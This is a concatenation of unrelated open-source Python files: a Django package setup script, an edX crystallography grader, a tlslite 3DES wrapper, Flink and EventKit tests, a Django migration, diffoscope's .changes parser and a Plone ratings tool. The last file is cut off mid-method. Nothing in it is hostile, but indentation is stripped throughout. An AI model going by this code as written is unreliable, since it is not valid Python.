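# >>> re.search(r"^__version__ = ['\"]([^'\"]*)['\"]", "__version__ = '1.2.3'", re.M).group(1)
# '1.2.3'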
if sys.version_info[0] >= 3:
# Akismet 0.2 does not support Python 3.
install_requires=[
'django-crispy-forms>=1.1.1',
]
if 'install' in sys.argv:
print("\nwarning: skipped Akismet as dependency because it does not have a Python 3 version.")
else:
install_requires=[
'django-crispy-forms>=1.1.1',
'akismet>=0.2',
]
setup(
name='django-fluent-comments',
version=find_version('fluent_comments', '__init__.py'),
license='Apache License, Version 2.0',
install_requires=install_requires,
requires=[
'Django (>=1.3)', # Using staticfiles
],
extras_require = {
'threadedcomments': ['django-threadedcomments>=0.9'],
},
description='A modern, ajax-based appearance for django_comments',
long_description=read('README.rst'),
author='Diederik van der Boor',
author_email='[email protected]',
url='https://github.com/edoburu/django-fluent-comments',
download_url='https://github.com/edoburu/django-fluent-comments/zipball/master',
packages=find_packages(exclude=('example*',)),
include_package_data=True,
zip_safe=False,
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
| apache-2.0 |
andyzsf/edx | common/lib/chem/chem/miller.py | 182 | 9162 | """ Calculation of Miller indices """
import numpy as np
import math
import fractions as fr
import decimal
import json
def lcm(a, b):
"""
Returns least common multiple of a, b
Args:
a, b: floats
Returns:
float
"""
return a * b / fr.gcd(a, b)
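# Illustrative example (hedged): lcm(4, 6) == 4 * 6 / gcd(4, 6) == 24 / 2 == 12.
# fr.gcd is the Python 2 home of gcd (it moved to math.gcd in Python 3.5+).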
def segment_to_fraction(distance):
"""
    Converts the lengths at which the plane cuts the axes to a fraction.
    Tries to convert distance to the closest nice fraction with denominator
    less than or equal to 10. This is purely for simplicity and clarity of
    learning purposes. Jenny: 'In typical courses students usually do not
    encounter indices any higher than 6'.
    If distance is not a number (numpy nan), it means that the plane is
    parallel to the axis or contains it. The inverted fraction of nan
    (nan is 1/0), i.e. 0 / 1, is returned.
    Generally (special cases):
    a) If distance is smaller than some constant, e.g. 0.01011, the
    fraction's denominator is usually much greater than 10.
    b) Also, if a student sets a point at 0.66 -> 1/3, it is the (3,3,3)
    plane, but if he slightly moves the mouse and clicks on 0.65 -> it will
    be the (16,15,16) plane. That's why point coordinates are adjusted to
    the closest tick or tick + tick / 2 value, and the UI now sends to the
    server only values that are multiples of 0.05 (half of a tick). The same
    rounding is implemented for unittests.
    But if one wants to calculate Miller indices with exact coordinates and
    with nice fractions (which produce small Miller indices), one may want
    to shift to a new origin if segments are like S = (0.015, >0.05, >0.05),
    i.e. close to zero in one coordinate. One may update S to
    (0, >0.05, >0.05) and shift the origin. In this way nice small fractions
    are obtained. There can also be a degenerate case when
    S = (0.015, 0.012, >0.05): if S is updated to (0, 0, >0.05), it is a
    line. This case should be considered separately. (Small nice Miller
    numbers and the possibility to create very small segments cannot be
    supported at the same time.)
    Args:
        distance: float distance that the plane cuts on an axis; it must not
        be 0. Distance is a multiple of 0.05.
Returns:
Inverted fraction.
0 / 1 if distance is nan
"""
if np.isnan(distance):
return fr.Fraction(0, 1)
else:
fract = fr.Fraction(distance).limit_denominator(10)
return fr.Fraction(fract.denominator, fract.numerator)
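# Illustrative behaviour (hedged, assuming the 0.05-multiple inputs described
# above): segment_to_fraction(0.5) returns Fraction(2, 1), the inverse of 1/2,
# and segment_to_fraction(float('nan')) returns Fraction(0, 1).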
def sub_miller(segments):
'''
Calculates Miller indices from segments.
Algorithm:
1. Obtain inverted fraction from segments
2. Find common denominator of inverted fractions
    3. Reduce fractions to the common denominator and throw the denominator
    away.
    4. Return the obtained values.
    Args:
        List of 3 floats, meaning the distances that the plane cuts on the
        x, y, z axes. No float equals zero: the plane does not intersect the
        origin, i.e. a shift of origin has already been done.
Returns:
String that represents Miller indices, e.g: (-6,3,-6) or (2,2,2)
'''
fracts = [segment_to_fraction(segment) for segment in segments]
common_denominator = reduce(lcm, [fract.denominator for fract in fracts])
miller_indices = ([
fract.numerator * math.fabs(common_denominator) / fract.denominator
for fract in fracts
])
    return '(' + ','.join(map(str, map(decimal.Decimal, miller_indices))) + ')'
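# Illustrative example (hedged): for segments (0.5, 1.0, nan) the inverted
# fractions are 2/1, 1/1 and 0/1, the common denominator is 1, so
# sub_miller([0.5, 1.0, float('nan')]) would return '(2,1,0)'.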
def miller(points):
"""
Calculates Miller indices from points.
Algorithm:
    1. Calculate the normal vector to a plane that goes through all points.
2. Set origin.
3. Create Cartesian coordinate system (Ccs).
4. Find the lengths of segments of which the plane cuts the axes. Equation
of a line for axes: Origin + (Coordinate_vector - Origin) * parameter.
    5. If the plane goes through the Origin:
    a) Find a new random origin: find a unit cube vertex not crossed by the
    plane.
    b) Repeat 2-4.
    c) Fix the signs of segments after the Origin shift. This means
    considering the original directions of the axes. E.g.: Origin was 0,0,0
    and became new_origin. If new_origin has the same Y coordinate as
    Origin, then the segment does not change its sign. But if new_origin has
    a different Y coordinate than Origin (was 0, became 1), then the segment
    has to change its sign (it now lies on the negative side of the Y axis).
    A new Origin value of 0 in the X, Y or Z coordinate means that the
    segment does not change sign; a value of 1 means it does change. So the
    new sign is (1 - 2 * new_origin): 0 -> 1, 1 -> -1
6. Run function that calculates miller indices from segments.
Args:
List of points. Each point is list of float coordinates. Order of
coordinates in point's list: x, y, z. Points are different!
Returns:
String that represents Miller indices, e.g: (-6,3,-6) or (2,2,2)
"""
N = np.cross(points[1] - points[0], points[2] - points[0])
O = np.array([0, 0, 0])
P = points[0] # point of plane
Ccs = map(np.array, [[1.0, 0, 0], [0, 1.0, 0], [0, 0, 1.0]])
segments = ([
np.dot(P - O, N) / np.dot(ort, N) if np.dot(ort, N) != 0
else np.nan for ort in Ccs
])
if any(x == 0 for x in segments): # Plane goes through origin.
vertices = [
# top:
np.array([1.0, 1.0, 1.0]),
np.array([0.0, 0.0, 1.0]),
np.array([1.0, 0.0, 1.0]),
np.array([0.0, 1.0, 1.0]),
# bottom, except 0,0,0:
np.array([1.0, 0.0, 0.0]),
np.array([0.0, 1.0, 0.0]),
            np.array([1.0, 1.0, 0.0]),
]
for vertex in vertices:
if np.dot(vertex - O, N) != 0: # vertex not in plane
new_origin = vertex
break
# obtain new axes with center in new origin
X = np.array([1 - new_origin[0], new_origin[1], new_origin[2]])
Y = np.array([new_origin[0], 1 - new_origin[1], new_origin[2]])
Z = np.array([new_origin[0], new_origin[1], 1 - new_origin[2]])
new_Ccs = [X - new_origin, Y - new_origin, Z - new_origin]
segments = ([np.dot(P - new_origin, N) / np.dot(ort, N) if
np.dot(ort, N) != 0 else np.nan for ort in new_Ccs])
        # fix signs of indices: 0 -> 1, 1 -> -1
segments = (1 - 2 * new_origin) * segments
return sub_miller(segments)
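# Illustrative usage (hedged sketch): the plane through the three unit points
# has normal (1, 1, 1) and cuts every axis at 1, so
# miller([np.array([1.0, 0, 0]), np.array([0, 1.0, 0]), np.array([0, 0, 1.0])])
# would return '(1,1,1)'.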
def grade(user_input, correct_answer):
'''
Grade crystallography problem.
    Returns True if the lattices are the same and the Miller indices are the
    same or negated, e.g. (2,2,2) matches (2, 2, 2) or (-2, -2, -2), because
    the sign depends only on the student's selection of origin.
Args:
user_input, correct_answer: json. Format:
user_input: {"lattice":"sc","points":[["0.77","0.00","1.00"],
["0.78","1.00","0.00"],["0.00","1.00","0.72"]]}
correct_answer: {'miller': '(00-1)', 'lattice': 'bcc'}
"lattice" is one of: "", "sc", "bcc", "fcc"
Returns:
        True or False.
'''
def negative(m):
"""
Change sign of Miller indices.
Args:
m: string with meaning of Miller indices. E.g.:
(-6,3,-6) -> (6, -3, 6)
Returns:
String with changed signs.
"""
output = ''
i = 1
while i in range(1, len(m) - 1):
if m[i] in (',', ' '):
output += m[i]
elif m[i] not in ('-', '0'):
output += '-' + m[i]
elif m[i] == '0':
output += m[i]
else:
i += 1
output += m[i]
i += 1
return '(' + output + ')'
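    # Illustrative example (hedged): negative('(-6,3,-6)') -> '(6,-3,6)'.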
def round0_25(point):
"""
        Rounds point coordinates to the closest 0.05 value.
Args:
point: list of float coordinates. Order of coordinates: x, y, z.
Returns:
            list of coordinates rounded to the closest 0.05 value
"""
rounded_points = []
for coord in point:
base = math.floor(coord * 10)
fractional_part = (coord * 10 - base)
aliquot0_25 = math.floor(fractional_part / 0.25)
if aliquot0_25 == 0.0:
rounded_points.append(base / 10)
if aliquot0_25 in (1.0, 2.0):
rounded_points.append(base / 10 + 0.05)
if aliquot0_25 == 3.0:
rounded_points.append(base / 10 + 0.1)
return rounded_points
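    # Illustrative example (hedged, subject to float rounding):
    # round0_25([0.66, 0.72, 1.0]) -> [0.65, 0.7, 1.0]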
user_answer = json.loads(user_input)
if user_answer['lattice'] != correct_answer['lattice']:
return False
points = [map(float, p) for p in user_answer['points']]
if len(points) < 3:
return False
    # round points to the closest 0.05 value
points = [round0_25(point) for point in points]
points = [np.array(point) for point in points]
# print miller(points), (correct_answer['miller'].replace(' ', ''),
# negative(correct_answer['miller']).replace(' ', ''))
if miller(points) in (correct_answer['miller'].replace(' ', ''), negative(correct_answer['miller']).replace(' ', '')):
return True
return False
| agpl-3.0 |
RockySteveJobs/python-for-android | python-build/python-libs/gdata/build/lib/gdata/tlslite/utils/OpenSSL_TripleDES.py | 359 | 1666 | """OpenSSL/M2Crypto 3DES implementation."""
from cryptomath import *
from TripleDES import *
if m2cryptoLoaded:
def new(key, mode, IV):
return OpenSSL_TripleDES(key, mode, IV)
class OpenSSL_TripleDES(TripleDES):
def __init__(self, key, mode, IV):
TripleDES.__init__(self, key, mode, IV, "openssl")
self.key = key
self.IV = IV
def _createContext(self, encrypt):
context = m2.cipher_ctx_new()
cipherType = m2.des_ede3_cbc()
m2.cipher_init(context, cipherType, self.key, self.IV, encrypt)
return context
def encrypt(self, plaintext):
TripleDES.encrypt(self, plaintext)
context = self._createContext(1)
ciphertext = m2.cipher_update(context, plaintext)
m2.cipher_ctx_free(context)
self.IV = ciphertext[-self.block_size:]
return ciphertext
def decrypt(self, ciphertext):
TripleDES.decrypt(self, ciphertext)
context = self._createContext(0)
#I think M2Crypto has a bug - it fails to decrypt and return the last block passed in.
#To work around this, we append sixteen zeros to the string, below:
plaintext = m2.cipher_update(context, ciphertext+('\0'*16))
#If this bug is ever fixed, then plaintext will end up having a garbage
#plaintext block on the end. That's okay - the below code will ignore it.
plaintext = plaintext[:len(ciphertext)]
m2.cipher_ctx_free(context)
self.IV = ciphertext[-self.block_size:]
return plaintext | apache-2.0 |
apache/flink | flink-python/pyflink/table/tests/test_correlate.py | 5 | 4123 | ################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
from pyflink.table import expressions as expr
from pyflink.testing.test_case_utils import PyFlinkStreamTableTestCase
class CorrelateTests(PyFlinkStreamTableTestCase):
def test_join_lateral(self):
t_env = self.t_env
t_env.create_java_temporary_system_function("split",
"org.apache.flink.table.legacyutils.TableFunc1")
source = t_env.from_elements([("1", "1#3#5#7"), ("2", "2#4#6#8")], ["id", "words"])
result = source.join_lateral("split(words) as (word)")
query_operation = result._j_table.getQueryOperation()
self.assertEqual('INNER', query_operation.getJoinType().toString())
self.assertTrue(query_operation.isCorrelated())
self.assertEqual('true', query_operation.getCondition().toString())
def test_join_lateral_with_join_predicate(self):
t_env = self.t_env
t_env.create_java_temporary_system_function("split",
"org.apache.flink.table.legacyutils.TableFunc1")
source = t_env.from_elements([("1", "1#3#5#7"), ("2", "2#4#6#8")], ["id", "words"])
result = source.join_lateral(expr.call('split', source.words).alias('word'),
expr.col('id') == expr.col('word'))
query_operation = result._j_table.getQueryOperation()
self.assertEqual('INNER', query_operation.getJoinType().toString())
self.assertTrue(query_operation.isCorrelated())
self.assertEqual('equals(id, word)',
query_operation.getCondition().toString())
def test_left_outer_join_lateral(self):
t_env = self.t_env
t_env.create_java_temporary_system_function("split",
"org.apache.flink.table.legacyutils.TableFunc1")
source = t_env.from_elements([("1", "1#3#5#7"), ("2", "2#4#6#8")], ["id", "words"])
result = source.left_outer_join_lateral(expr.call('split', source.words).alias('word'))
query_operation = result._j_table.getQueryOperation()
self.assertEqual('LEFT_OUTER', query_operation.getJoinType().toString())
self.assertTrue(query_operation.isCorrelated())
self.assertEqual('true', query_operation.getCondition().toString())
def test_left_outer_join_lateral_with_join_predicate(self):
t_env = self.t_env
t_env.create_java_temporary_system_function("split",
"org.apache.flink.table.legacyutils.TableFunc1")
source = t_env.from_elements([("1", "1#3#5#7"), ("2", "2#4#6#8")], ["id", "words"])
# only support "true" as the join predicate currently
result = source.left_outer_join_lateral(expr.call('split', source.words).alias('word'),
expr.lit(True))
query_operation = result._j_table.getQueryOperation()
self.assertEqual('LEFT_OUTER', query_operation.getJoinType().toString())
self.assertTrue(query_operation.isCorrelated())
self.assertEqual('true', query_operation.getCondition().toString())
| apache-2.0 |
peterbarkley/SurfGeckos | djangosite/snippets/migrations/0012_auto_20170917_2131.py | 1 | 2390 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-18 07:31
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('snippets', '0011_auto_20170917_2103'),
]
operations = [
migrations.AlterField(
model_name='actionlevel',
name='aquatic_ecotoxicity',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='actionlevel',
name='direct_exposure',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='actionlevel',
name='dw_toxicity',
field=models.FloatField(blank=True, null=True, verbose_name='Drinking Water Toxicity'),
),
migrations.AlterField(
model_name='actionlevel',
name='gw_gross_contamination',
field=models.FloatField(blank=True, null=True, verbose_name='Groundwater Gross Contamination'),
),
migrations.AlterField(
model_name='actionlevel',
name='gw_vapor_emissions',
field=models.FloatField(blank=True, null=True, verbose_name='Groundwater Vapor Emissions'),
),
migrations.AlterField(
model_name='actionlevel',
name='indoor_air',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='actionlevel',
name='leaching',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='actionlevel',
name='shallow_soil_vapor',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='actionlevel',
name='soil_gross_contamination',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='actionlevel',
name='soil_vapor_emissions',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='actionlevel',
name='terrestrial_ecotoxicity',
field=models.FloatField(blank=True, null=True),
),
]
| mit |
anthraxx/diffoscope | diffoscope/changes.py | 2 | 11351 | # -*- coding: utf-8 -*-
#
# changes.py — .changes file handling class
#
# This file was originally part of debexpo
# https://alioth.debian.org/projects/debexpo/
#
# Copyright © 2008 Jonny Lamb <[email protected]>
# Copyright © 2010 Jan Dittberner <[email protected]>
# Copyright © 2012 Arno Töll <[email protected]>
# Copyright © 2012 Paul Tagliamonte <[email protected]>
# Copyright © 2014 Jérémy Bobbio <[email protected]>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
"""
This code deals with the reading and processing of Debian .changes files. This
code is copyright (c) Jonny Lamb, and is used by dput, rather than created as
a result of it. Thank you Jonny.
"""
__author__ = 'Jonny Lamb'
__copyright__ = 'Copyright © 2008 Jonny Lamb, Copyright © 2010 Jan Dittberner'
__license__ = 'MIT'
import os.path
import hashlib
import logging
import subprocess
from debian import deb822
from .tools import tool_required
logger = logging.getLogger(__name__)
class ChangesFileException(Exception):
pass
class Changes(object):
"""
Changes object to help process and store information regarding Debian
.changes files, used in the upload process.
"""
def __init__(self, filename=None, string=None):
"""
Object constructor. The object allows the user to specify **either**:
#. a path to a *changes* file to parse
#. a string with the *changes* file contents.
::
a = Changes(filename='/tmp/packagename_version.changes')
b = Changes(string='Source: packagename\\nMaintainer: ...')
``filename``
Path to *changes* file to parse.
``string``
*changes* file in a string to parse.
"""
if (filename and string) or (not filename and not string):
raise TypeError
if filename:
self._absfile = os.path.abspath(filename)
self._directory = os.path.dirname(self._absfile)
self._data = deb822.Changes(open(filename, encoding='utf-8'))
self.basename = os.path.basename(filename)
else:
self._data = deb822.Changes(string)
if len(self._data) == 0:
raise ChangesFileException('Changes file could not be parsed.')
def get_filename(self):
"""
        Returns the filename from which the changes file was generated.
        Please note that this is just the basename, not the full path, or
even a relative path. For the absolute path to the changes file, please
see :meth:`get_changes_file`.
"""
return self.basename
def get_changes_file(self):
"""
Return the full, absolute path to the changes file. For just the
filename, please see :meth:`get_filename`.
"""
return os.path.join(self._directory, self.get_filename())
def get_path(self, filename):
"""
Return the full, absolute path to a file referenced by the changes
file.
"""
return os.path.join(self._directory, filename)
def get_files(self):
"""
Returns a list of files referenced in the changes file, such as
the .dsc, .deb(s), .orig.tar.gz, and .diff.gz or .debian.tar.gz.
All strings in the array will be absolute paths to the files.
"""
return [os.path.join(self._directory, z['name'])
for z in self._data['Files']]
def keys(self):
return self._data.keys()
def __getitem__(self, key):
"""
Returns the value of the rfc822 key specified.
``key``
Key of data to request.
"""
return self._data[key]
def __contains__(self, key):
"""
Returns whether the specified RFC822 key exists.
``key``
Key of data to check for existence.
"""
return key in self._data
def get(self, key, default=None):
"""
Returns the value of the rfc822 key specified, but defaults
to a specific value if not found in the rfc822 file.
``key``
Key of data to request.
``default``
Default return value if ``key`` does not exist.
"""
return self._data.get(key, default)
def get_as_string(self, key):
"""
Returns the value of the rfc822 key specified as the original string.
``key``
Key of data to request.
"""
return self._data.get_as_string(key)
def get_component(self):
"""
Returns the component of the package.
"""
return self._parse_section(self._data['Files'][0]['section'])[0]
def get_priority(self):
"""
Returns the priority of the package.
"""
return self._parse_section(self._data['Files'][0]['priority'])[1]
def get_section(self):
"""
Returns the section of the package.
"""
return self._parse_section(self._data['Files'][0]['section'])[1]
def get_dsc(self):
"""
Returns the name of the .dsc file.
"""
for item in self.get_files():
if item.endswith('.dsc'):
return item
def get_pool_path(self):
"""
        Returns the path in the pool where the changes file would be placed.
"""
return self._data.get_pool_path()
def get_package_name(self):
"""
Returns the source package name
"""
return self.get("Source")
def _parse_section(self, section):
"""
Works out the component and section from the "Section" field.
Sections like `python` or `libdevel` are in main.
Sections with a prefix, separated with a forward-slash also show the
component.
It returns a list of strings in the form [component, section].
For example, `non-free/python` has component `non-free` and section
`python`.
``section``
Section name to parse.
"""
if '/' in section:
return section.split('/')
else:
return ['main', section]
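    # Illustrative examples (hedged):
    #   _parse_section('non-free/python') -> ['non-free', 'python']
    #   _parse_section('python') -> ['main', 'python']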
def set_directory(self, directory):
if directory:
self._directory = directory
else:
self._directory = ""
def validate(self, check_hash="sha1", check_signature=True):
"""
See :meth:`validate_checksums` for ``check_hash``, and
:meth:`validate_signature` if ``check_signature`` is True.
"""
self.validate_checksums(check_hash)
if check_signature:
self.validate_signature(check_signature)
else:
logger.info("Not checking signature")
@tool_required('gpg')
def validate_signature(self, check_signature=True):
"""
Validate the GPG signature of a .changes file.
        Throws a :class:`ChangesFileException` if there's
an issue with the GPG signature. Returns the GPG key ID.
"""
pipe = subprocess.Popen(
["gpg", "--status-fd", "1", "--verify", "--batch",
self.get_changes_file()],
shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
gpg_output, gpg_output_stderr = pipe.communicate()
print(gpg_output)
if pipe.returncode != 0:
raise ChangesFileException(
"Unknown problem while verifying signature")
# contains verbose human readable GPG information
gpg_output_stderr = str(gpg_output_stderr, encoding='utf8')
print(gpg_output_stderr)
gpg_output = gpg_output.decode(encoding='UTF-8')
if gpg_output.count('[GNUPG:] GOODSIG'):
pass
elif gpg_output.count('[GNUPG:] BADSIG'):
raise ChangesFileException("Bad signature")
elif gpg_output.count('[GNUPG:] ERRSIG'):
raise ChangesFileException("Error verifying signature")
elif gpg_output.count('[GNUPG:] NODATA'):
raise ChangesFileException("No signature on")
else:
raise ChangesFileException(
"Unknown problem while verifying signature"
)
key = None
for line in gpg_output.split("\n"):
if line.startswith('[GNUPG:] VALIDSIG'):
key = line.split()[2]
return key
def validate_checksums(self, check_hash="sha1"):
"""
        Validate checksums for a package, using ``check_hash``'s type
to validate the package.
Valid ``check_hash`` types:
* sha1
* sha256
* md5
"""
logger.debug("validating %s checksums", check_hash)
for filename in self.get_files():
if check_hash == "sha1":
hash_type = hashlib.sha1()
checksums = self.get("Checksums-Sha1")
field_name = "sha1"
elif check_hash == "sha256":
hash_type = hashlib.sha256()
checksums = self.get("Checksums-Sha256")
field_name = "sha256"
elif check_hash == "md5":
hash_type = hashlib.md5()
checksums = self.get("Files")
field_name = "md5sum"
changed_files = None # appease pylint
for changed_files in checksums:
if changed_files['name'] == os.path.basename(filename):
break
else:
                raise AssertionError(
                    "get_files() returns different files than Files: knows?!")
with open(os.path.join(self._directory, filename), "rb") as fc:
while True:
chunk = fc.read(131072)
if not chunk:
break
hash_type.update(chunk)
fc.close()
if not hash_type.hexdigest() == changed_files[field_name]:
raise ChangesFileException(
"Checksum mismatch for file %s: %s != %s" % (
filename,
hash_type.hexdigest(),
changed_files[field_name]
))
else:
logger.debug("%s Checksum for file %s matches",
field_name, filename)
| gpl-3.0 |
venicegeo/eventkit-cloud | eventkit_cloud/utils/tests/test_coordinate_converter.py | 1 | 2036 | import json
import logging
import requests_mock
from django.conf import settings
from django.test import TestCase, override_settings
from eventkit_cloud.utils.geocoding.coordinate_converter import CoordinateConverter
logger = logging.getLogger(__name__)
mockURL = "http://test.test"
@override_settings(GEOCODING_AUTH_URL=None)
class TestConvert(TestCase):
def setUp(self):
self.mock_requests = requests_mock.Mocker()
self.mock_requests.start()
self.addCleanup(self.mock_requests.stop)
settings.CONVERT_API_URL = mockURL
def test_convert_success(self):
convert_response_success = {
"type": "Feature",
"geometry": {
"type": "Point",
"coordinates": [
-112.61869345019069,
50.00105275281522
]
},
"properties": {
"name": "12UUA8440",
"from": "mgrs",
"to": "decdeg"
}
}
self.mock_requests.get(mockURL, text=json.dumps(convert_response_success), status_code=200)
convert = CoordinateConverter()
result = convert.get("18S TJ 97100 03003")
self.assertIsNotNone(result.get("geometry"))
self.assertEqual(result.get("type"), "Feature")
properties = result.get("properties")
geometry = result.get("geometry")
self.assertIsInstance(properties, dict)
self.assertIsInstance(geometry, dict)
self.assertEqual(geometry.get("type"), "Point")
self.assertIsInstance(geometry.get("coordinates"), list)
def test_convert_fail(self):
convert_response_fail = {
"properties": {
"name": "12UUA844",
"from": "mgrs",
"to": "decdeg"
}
}
with self.assertRaises(Exception):
self.mock_requests.get(mockURL, text=json.dumps(convert_response_fail), status_code=500)
CoordinateConverter().get_data()
| bsd-3-clause |
wangjun/odoo | addons/l10n_de/__init__.py | 693 | 1057 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
tinkerthaler/odoo | addons/resource/__init__.py | 448 | 1086 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import resource
import faces
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
Cenditel/cenditel.comunidades.cynin | products/ATRatings/RatingsTool.py | 4 | 13993 | import os, sys
import urllib
import Globals
from AccessControl import ClassSecurityInfo
from DateTime import DateTime
from OFS.SimpleItem import SimpleItem
from Acquisition import aq_base
from Products.Archetypes.Referenceable import Referenceable
from OFS.PropertyManager import PropertyManager
from Products.CMFCore.utils import UniqueObject, getToolByName
from Products.CMFPlone.PloneBaseTool import PloneBaseTool
from Products.PageTemplates.PageTemplateFile import PageTemplateFile
# lazy way of configuring this tool
from config import MIN_RATING_VALUE, MAX_RATING_VALUE, STORAGE_CLASS, STORAGE_ARGS, NEUTRAL_RATING_VALUE
from Permissions import ADD_RATING_PERMISSION
from Products.CMFCore.permissions import ManagePortal
from ZODBStorage import HITS_SUMMARY_ID, RATINGS_SUMMARY_ID
# ##############################################################################
class RatingsTool(PloneBaseTool, UniqueObject, SimpleItem, Referenceable, PropertyManager):
""" """
id = 'portal_ratings'
meta_type= 'Ratings Tool'
# toolicon = 'skins/plone_images/favorite_icon.gif'
security = ClassSecurityInfo()
isPrincipiaFolderish = 0
storage = None
__implements__ = (PloneBaseTool.__implements__, SimpleItem.__implements__, )
manage_options = ( ({'label':'Overview', 'action':'manage_overview'},) +
PropertyManager.manage_options + SimpleItem.manage_options)
security.declareProtected(ManagePortal, 'manage_overview')
manage_overview = PageTemplateFile('www/portal_ratings_manage_overview', globals())
manage_overview.__name__ = 'manage_overview'
manage_overview._need__name__ = 0
manage_main = manage_overview
_properties = PropertyManager._properties + (
{'id':'allowed_rating_types', 'type': 'lines', 'mode':'w',
'label':'Allowed raing types'},
{'id':'allowed_counting_types', 'type': 'lines', 'mode':'w',
'label':'Allowed hit counting types'},
)
allowed_rating_types = ['Document', 'News Item', 'File', 'Image', 'Link', ]
allowed_counting_types = ['Document', 'News Item', 'File', 'Image', 'Link', ]
def isRatingAllowedFor(self, content):
""" do content allow rating?
Add a 'allowRatings' boolean property to the context to enable it"""
allowRatings = getattr(content, 'enableRatings', 1)
if not allowRatings:
return 0
if content.getPortalTypeName() not in self.allowed_rating_types:
return 0
return hasattr(aq_base(content), 'UID')
def isCountingAllowedFor(self, content):
""" do the content allow hit count
Add a 'allowCountings' boolean property to the context to enable it"""
allowCountings = getattr(content, 'enableCountings', 0)
if not allowCountings:
return 0
if content.getPortalTypeName() not in self.allowed_counting_types:
return 0
return hasattr(aq_base(content), 'UID')
security.declarePublic('getCyninRating')
def getCyninRating(self,uid):
cyninrating = self._getCyninRating(uid)
if cyninrating is None:
return None
else:
return cyninrating
security.declarePublic('getCyninRatingCount')
def getCyninRatingCount(self,uid):
return self._getCyninRatingCount(uid)
security.declarePublic('getTopRatingsAll')
def getTopRatingsAll(self,brains):
""" get top n hot contents from catalog brains """
results = []
for brain in brains:
value = self._getCyninRating(brain.UID)
if value <> None:
ratecount = self.getRatingCount(brain.UID)
cyninratingcount = self._getCyninRatingCount(brain.UID)
results.append( (value, brain, ratecount, cyninratingcount))
def sortlist(x,y):
if cmp(y[0],x[0]) != 0:
return cmp(y[0],x[0])
else:
return cmp(y[2],x[2])
        results.sort(lambda x, y: sortlist(x, y))
return results
security.declarePublic('getTopRatings')
def getTopRatings(self, brains, limit=5):
""" get top n hot contents from catalog brains """
results = []
results = self.getTopRatingsAll(brains)
return results[:limit]
security.declarePublic('getBadRatings')
def getBadRatings(self, brains, limit=5):
""" get bad ratings from catalog brains """
results = []
for brain in brains:
value = self.getRatingMean(brain.UID)
if value:
results.append((value, brain))
results.sort(lambda x,y:cmp(x[0], y[0]))
return results[:limit]
security.declarePublic('getTopCountings')
def getTopCountings(self, brains, limit=5):
""" get top n hot contents from catalog brains """
results = []
for brain in brains:
count = self.getHitCount(brain.UID)
if count:
results.append((count, brain))
